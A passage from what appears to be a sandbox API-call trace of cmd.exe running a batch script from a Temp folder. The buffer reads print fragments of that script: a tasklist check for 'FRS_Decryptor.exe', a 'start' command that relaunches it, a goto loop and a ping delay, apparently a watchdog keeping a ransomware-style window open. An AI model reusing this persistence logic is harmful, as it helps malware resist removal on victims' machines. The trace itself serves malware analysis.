_String2="TITLE") returned -4 [0096.762] _wcsicmp (_String1="ping", _String2="START") returned -3 [0096.762] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0096.762] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0096.762] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0096.762] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0096.762] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0096.762] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0096.762] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0096.762] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0096.762] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0096.762] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0096.762] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0096.762] SetErrorMode (uMode=0x0) returned 0x0 [0096.762] SetErrorMode (uMode=0x1) returned 0x0 [0096.762] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0096.762] SetErrorMode (uMode=0x0) returned 0x1 [0096.762] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.762] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0096.762] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.762] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.762] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0096.763] GetLastError () returned 0x2 [0096.763] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.763] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59e70 [0096.763] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0096.763] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0096.763] GetLastError () returned 0x2 [0096.763] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59b30 [0096.763] FindClose (in: hFindFile=0xd59b30 | out: hFindFile=0xd59b30) returned 1 [0096.763] GetFileType (hFile=0x28) returned 0x2 [0096.763] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0096.763] _dup (_FileHandle=1) returned 3 [0096.763] _close (_FileHandle=1) returned 0 [0096.763] _wcsicmp (_String1="nul", _String2="con") returned 11 [0096.763] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0096.763] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0096.763] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0096.764] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0096.764] SetErrorMode (uMode=0x0) returned 0x0 [0096.764] SetErrorMode (uMode=0x1) returned 0x0 [0096.764] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0096.764] SetErrorMode (uMode=0x0) returned 0x1 [0096.764] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.764] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0096.764] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.764] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.764] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0096.764] GetLastError () returned 0x2 [0096.764] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.764] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a030 [0096.764] FindClose (in: hFindFile=0xd5a030 | out: hFindFile=0xd5a030) returned 1 [0096.764] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0096.764] GetLastError () returned 0x2 [0096.764] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a030 [0096.765] FindClose (in: hFindFile=0xd5a030 | out: hFindFile=0xd5a030) returned 1 [0096.765] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0096.765] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0096.765] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0096.765] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0096.765] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0096.766] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0096.766] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.766] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.766] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0096.766] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0096.766] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0096.766] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0096.766] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x158, dwProcessId=0x4c8, dwThreadId=0x4d8)) returned 1 [0096.768] CloseHandle (hObject=0x158) returned 1 [0096.768] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0096.768] GetEnvironmentStringsW () returned 0xd2c668* [0096.768] FreeEnvironmentStringsA (penv="=") returned 1 [0096.768] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0098.842] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0098.842] CloseHandle (hObject=0x36c) returned 1 [0098.842] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0098.842] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0098.842] GetEnvironmentStringsW () returned 0xd30508* [0098.842] FreeEnvironmentStringsA (penv="=") returned 1 [0098.842] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0098.842] GetEnvironmentStringsW () returned 0xd7e510* [0098.842] FreeEnvironmentStringsA (penv="=") returned 1 [0098.842] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0098.842] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0098.842] _close (_FileHandle=3) returned 0 [0098.842] _get_osfhandle (_FileHandle=1) returned 0x28 [0098.842] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0098.843] _get_osfhandle (_FileHandle=1) returned 0x28 [0098.843] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0098.843] _get_osfhandle (_FileHandle=0) returned 0x24 [0098.843] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0098.843] SetConsoleInputExeNameW () returned 0x1 [0098.843] GetConsoleOutputCP () returned 0x1b5 [0098.843] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0098.843] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.843] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0098.844] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0098.844] _get_osfhandle (_FileHandle=3) returned 0x260 [0098.844] SetFilePointer (in: hFile=0x260, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0098.844] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0098.844] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0098.844] SetFilePointer (in: hFile=0x260, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0098.844] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0098.844] GetFileType (hFile=0x260) returned 0x1 [0098.844] _get_osfhandle (_FileHandle=3) returned 0x260 [0098.844] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0098.844] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0098.844] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0098.844] SetFilePointer (in: hFile=0x260, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0098.844] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0098.844] GetFileType (hFile=0x260) returned 0x1 [0098.844] _get_osfhandle (_FileHandle=3) returned 0x260 [0098.844] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0098.845] _tell (_FileHandle=3) returned 2627 [0098.845] _close (_FileHandle=3) returned 0 [0098.845] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0098.845] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0098.845] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0098.845] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0098.845] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0098.849] feof (_File=0x76ea4c68) returned 0 [0098.849] ferror (_File=0x76ea4c68) returned 0 [0098.849] fgets (in: _Buf=0xd82b78, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0099.327] feof (_File=0x76ea4c68) returned 0 [0099.327] ferror (_File=0x76ea4c68) returned 0 [0099.327] fgets (in: _Buf=0xd86176, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0099.363] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0099.363] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43726, cbMultiByte=78, lpWideCharStr=0xd436d8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0099.364] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0099.364] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0099.364] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0099.364] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0099.364] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.364] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0099.364] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.364] GetFileSize (in: hFile=0x2b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0099.364] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0099.364] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.364] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0099.364] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.364] GetFileType (hFile=0x2b8) returned 0x1 [0099.364] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0099.364] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0099.364] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0099.365] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0099.365] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.365] GetFileType (hFile=0x2b8) returned 0x1 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0099.365] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0099.365] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0099.365] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.365] GetFileType (hFile=0x2b8) returned 0x1 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0099.365] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.365] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.365] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.365] GetFileType (hFile=0x2b8) returned 0x1 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.365] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0099.365] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0099.365] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.365] GetFileType (hFile=0x2b8) returned 0x1 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0099.365] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0099.365] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0099.365] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0099.366] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.366] GetFileType (hFile=0x2b8) returned 0x1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0099.366] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0099.366] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0099.366] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.366] GetFileType (hFile=0x2b8) returned 0x1 [0099.366] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0099.366] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, 